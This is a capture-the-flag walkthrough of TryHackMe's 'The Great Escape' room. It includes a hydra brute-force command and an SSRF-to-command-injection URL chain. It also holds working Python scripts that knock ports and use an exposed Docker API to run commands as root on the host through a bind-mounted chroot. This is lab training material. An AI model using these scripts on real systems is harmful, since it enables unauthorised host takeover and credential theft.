The Great Escape Tryhackme Writeup
By Shamsher Khan
This is a writeup of the TryHackMe room “The Great Escape”.
Room link: https://tryhackme.com/room/thegreatescape
Note: This room is free.
Docker, Networks, and Container Escapes; Oh My!
I wanted to explore the concept of a Docker escape. Docker is an extremely useful tool which allows us to isolate applications from each other and from the host OS without having to resort to virtual machines. Properly configured it can be very secure, but misconfigurations can introduce massive security holes, as we shall soon see.
Enumeration
Let’s take a look at the web server for now.
On the homepage, we see an admin section. Clicking into it, there’s a login form. Trying something like admin:password calls an API which returns a 401 Unauthorized response. Moreover, trying to register a new user throws an error saying signups are disabled.
Perhaps we can brute force the login?
Brute Force Login
hydra -l admin -P /usr/share/wordlists/rockyou.txt "$TARGET_IP" http-post-form '/api/login/:{"username"\:"^USER^","password"\:"^PASS^"}:F=ERROR:H=Content-Type\: application/json'
(The hydra module is http-post-form, the failure condition F= has to come right after the POST body, and the H= header goes after it; $TARGET_IP only expands inside double quotes.)
We get a lot of 503 errors, so the brute force isn’t going anywhere. Time to look elsewhere.
Directory Scanning
The hint indicates the file name is “well known”, so we create a wordlist of likely spellings:
wellknown
well-known
.well-known
.wellknown
WELLKNOWN
Wellknown
WEllknown
WeLlknown
WELLknown
......
......
etc.
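As an added example (not part of the original writeup), here is a small Python script that generates that kind of wordlist programmatically instead of typing the variants by hand. Which separators and case mutations are worth trying is my assumption; extend the lists as you like.

```python
# Added example: generate spelling/casing variants of "well known" for a
# directory-brute-force wordlist. Not from the original writeup; the set of
# separators and case mutations is an assumption, extend as needed.

def case_variants(word):
    """lower, UPPER, Capitalised, Title-Case, plus two cheap mutation
    families: upper-cased prefixes (Wellknown, WEllknown, WELknown, ...)
    and a single upper-cased letter anywhere (weLlknown, wellKnown, ...)."""
    lower = word.lower()
    forms = {lower, lower.upper(), lower.capitalize(), lower.title()}
    for i in range(1, len(lower) + 1):
        forms.add(lower[:i].upper() + lower[i:])
    for i, ch in enumerate(lower):
        if ch.isalpha():
            forms.add(lower[:i] + ch.upper() + lower[i + 1:])
    return forms


def wellknown_wordlist(parts=("well", "known"), separators=("", "-", "_")):
    """Every separator variant, every case variant, with and without the
    leading dot that hidden directories such as .well-known carry."""
    words = set()
    for sep in separators:
        for form in case_variants(sep.join(parts)):
            words.add(form)
            words.add("." + form)
    return sorted(words)


def write_wordlist(path, words):
    """Write one candidate per line; returns the number written."""
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    wordlist = wellknown_wordlist()
    print(write_wordlist("wellknown.txt", wordlist), "candidates written")
    # Feed the file to the scanner of your choice, e.g.
    # gobuster dir -u http://$TARGET_IP/ -w wellknown.txt -b "" -s "204,301,302,307,401,403"
```

The prefix-upper and single-letter mutations cover the odd capitalisations a developer might have typed; a full mixed-case enumeration of a nine-letter word would be 512 entries per separator and is rarely worth the requests.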
Gobuster
Running Gobuster with its default settings, everything we try returns a 200 status: the server does not answer 404 for paths that don’t exist.
Armed with this information, we know that 200 response codes are meaningless here, but other response codes (such as a 302) may indicate a directory is present. Let’s rerun our Gobuster command, but we’ll specify which response codes we want returned.
Checking the help page, we can see that Gobuster accepts the following response codes; “200,204,301,302,307,401,403”.
Remove status code 200 from that list:
gobuster dir -u http://10.10.211.97/ -w /usr/share/wordlists/dirb/common.txt -s "204,301,302,307,401,403"
(On Gobuster 3.1 and later, also pass -b "" because the default 404 blacklist conflicts with an explicit -s list.)
Gobuster didn’t find anything under http://10.10.207.227/.well-known, so we try dirb:
Here we find a security.txt file (the contact file that RFC 9116 places under /.well-known/). Using curl, we can get the first flag:
Another common file on servers is robots.txt. Our nmap scan showed us the presence of this file with a few disallowed entries; let’s take a closer look:
We already know about the api route, but what’s this exif-util thing? Let’s take a look:
The upload functionality did not help much.
From URL: checking whether the url parameter is vulnerable to SSRF.
Port 8080 was found by brute-forcing common ports.
The url parameter called a new internal route:
/api/exif?url=http:%2F%2F127.0.0.1:8080
This also did not lead anywhere, so let’s see whether the other entry in the robots file can be used:
/*.bak.txt
I brute-forced .bak.txt versions of the known file names and found
exif-util.bak.txt
Now we have a new host, api-dev-backup, which should be a docker container. Since this is a development backup I tried different injection techniques, and finally found a command injection:
http://10.10.193.190/api/exif?url=http://api-dev-backup:8080/exif?url=/etc/passwd
“Banned words”, which means there must be some filter going on.
Let’s try other commands.
Which means something is running: it read the id command as a file name. Let’s try other payloads.
And we successfully executed the command. We are root, but only inside the docker container.
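The chained request above is easy to get wrong because the inner URL carries its own query string. As an added example (my helper, not tooling from the writeup), the Python below builds the two-hop URL with the correct double percent-encoding and then unwinds it to show what each server sees after decoding its own query. The shape of both endpoints is taken from the URLs in the walkthrough; the banned-word filter and the final payload are not shown on the page, so the script only demonstrates the /etc/passwd read and how an arbitrary inner value (including shell metacharacters) survives both hops.

```python
import urllib.parse
import urllib.request

# Added example, not from the original writeup. Assumed shape of the two
# hops, taken from the URLs in the walkthrough: the public /api/exif?url=
# endpoint fetches whatever it is given (SSRF), and the internal
# api-dev-backup:8080/exif?url= endpoint treats its value as a file name
# that ends up on a shell. Instance IP and the rest are placeholders.

TARGET = "10.10.193.190"                     # the writeup's instance IP; substitute yours
INNER_HOST, INNER_PORT = "api-dev-backup", 8080


def build_chain(target, inner_value, inner_host=INNER_HOST, inner_port=INNER_PORT):
    """Return the outer URL. inner_value is percent-encoded once for the
    backup host, then the whole inner URL is encoded again for the public
    API, so '&', '#', ';', spaces and '%' survive both query parsers."""
    inner = f"http://{inner_host}:{inner_port}/exif?" + urllib.parse.urlencode({"url": inner_value})
    return f"http://{target}/api/exif?" + urllib.parse.urlencode({"url": inner})


def unwrap(url):
    """Simulate the decoding each hop performs: the list of successive
    'url' values, ending with what the backup host actually receives."""
    hops = []
    current = url
    while True:
        params = urllib.parse.parse_qs(urllib.parse.urlparse(current).query)
        if "url" not in params:
            return hops
        current = params["url"][0]
        hops.append(current)


def fetch(url, timeout=15):
    """Send the chained request through the public API; returns (status, body)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    url = build_chain(TARGET, "/etc/passwd")
    print(url)
    for n, hop in enumerate(unwrap(url), 1):
        print(f"hop {n} sees: {hop}")
    print(fetch(url))
```

Note that the URL in the writeup works with the inner value unencoded only because /etc/passwd contains no characters that the outer query parser cares about; once a payload contains `&`, `#` or a space, the outer API would truncate or mangle it unless it is encoded as above.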
I tried to get a reverse shell but was unsuccessful. It looks like all the outgoing traffic is blocked by the firewall. So, I manually started going through the container.
Here we found a git repository. Let’s enumerate it.
We can see that there are three commits. So, let’s check those out.
We found the root flag.
Just knock on ports 42, 1337, 10420, 6969 and 63000.
The default docker API port is 2375. Let’s check whether it is open or not.
The next 2 steps I give might be unnecessary, but I did them anyway: I added the machine IP with the docker port to tell docker to trust this instance and then restarted it.
sudo vim /etc/docker/daemon.json
I restarted my docker service by stopping it and then starting it again after waiting for at least 30 seconds.
sudo systemctl stop docker
<Wait 30 seconds>
sudo systemctl start docker
We can successfully list the docker images using the API.
Getting root shell
Here I have created a container from the frontend image in interactive mode, executing the sh binary. The root file system of the host is mounted on the /mnt directory of the container, and the root of the container is then changed to /mnt.
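The steps above (knock, confirm 2375 is open, list images, run a container with the host’s / bind-mounted and chroot into it) are what the docker CLI does over plain HTTP against the exposed daemon, so no daemon.json change on the attacking machine is needed. As an added example that is not part of the writeup, the Python below performs the same sequence directly against the Engine API: it knocks, checks the port, lists image tags, and creates a throw-away container that runs a command inside a chroot of the host file system and returns its output. The instance IP is a placeholder; the knock sequence and the frontend image name come from the walkthrough.

```python
import http.client
import json
import socket
import struct

# Added example, not the writeup's own tooling. Assumptions: TARGET is the
# room's machine IP (substitute yours); the knock sequence, the image name and
# the /:/mnt bind mount are taken from the walkthrough.
TARGET = "10.10.211.97"
KNOCK_SEQUENCE = (42, 1337, 10420, 6969, 63000)
DOCKER_PORT = 2375


def knock(host, ports, timeout=1.0, connect=None):
    """One TCP connect attempt per port, in order. The knock daemon only
    watches the sequence, so refused connections are expected. `connect`
    can be overridden to stub the network; returns [(port, errno), ...]."""
    if connect is None:
        def connect(h, p):
            with socket.socket() as s:
                s.settimeout(timeout)
                return s.connect_ex((h, p))
    return [(p, connect(host, p)) for p in ports]


def port_open(host, port, timeout=2.0):
    with socket.socket() as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def docker_request(host, method, path, body=None, port=DOCKER_PORT):
    """Minimal Engine API client over unauthenticated HTTP; returns (status, bytes)."""
    conn = http.client.HTTPConnection(host, port, timeout=30)
    headers = {"Content-Type": "application/json"} if body is not None else {}
    conn.request(method, path, body=json.dumps(body) if body is not None else None, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, data


def list_images(host):
    status, data = docker_request(host, "GET", "/images/json")
    if status != 200:
        raise RuntimeError(f"images/json failed: {status}")
    return [tag for img in json.loads(data) for tag in (img.get("RepoTags") or [])]


def escape_container_spec(image, command, mount="/mnt"):
    """API body equivalent to: docker run -v /:/mnt <image> chroot /mnt sh -c '<command>'."""
    return {
        "Image": image,
        "Cmd": ["chroot", mount, "sh", "-c", command],
        "HostConfig": {"Binds": [f"/:{mount}"]},
    }


def demux_logs(raw):
    """Non-TTY container logs are framed: 1 byte stream id (1=stdout,
    2=stderr), 3 zero bytes, 4-byte big-endian payload length, payload."""
    chunks, i = [], 0
    while i + 8 <= len(raw):
        _stream, length = struct.unpack(">B3xI", raw[i:i + 8])
        chunks.append(raw[i + 8:i + 8 + length])
        i += 8 + length
    return b"".join(chunks).decode(errors="replace")


def run_on_host(host, image, command):
    """Create, start, wait, read logs, delete: a one-shot command as host root."""
    status, data = docker_request(host, "POST", "/containers/create", escape_container_spec(image, command))
    if status != 201:
        raise RuntimeError(f"create failed: {status} {data!r}")
    cid = json.loads(data)["Id"]
    docker_request(host, "POST", f"/containers/{cid}/start")
    docker_request(host, "POST", f"/containers/{cid}/wait")
    _, logs = docker_request(host, "GET", f"/containers/{cid}/logs?stdout=1&stderr=1")
    docker_request(host, "DELETE", f"/containers/{cid}")
    return demux_logs(logs)


if __name__ == "__main__":
    knock(TARGET, KNOCK_SEQUENCE)
    print("docker API reachable:", port_open(TARGET, DOCKER_PORT))
    print("images:", list_images(TARGET))
    print(run_on_host(TARGET, "frontend", "id; hostname; ls /root"))
```

For an interactive shell the writeup’s docker CLI form is simpler (`docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt frontend chroot /mnt sh`); the API version is useful when the CLI is unavailable or when you want to script several commands without leaving containers behind.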
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…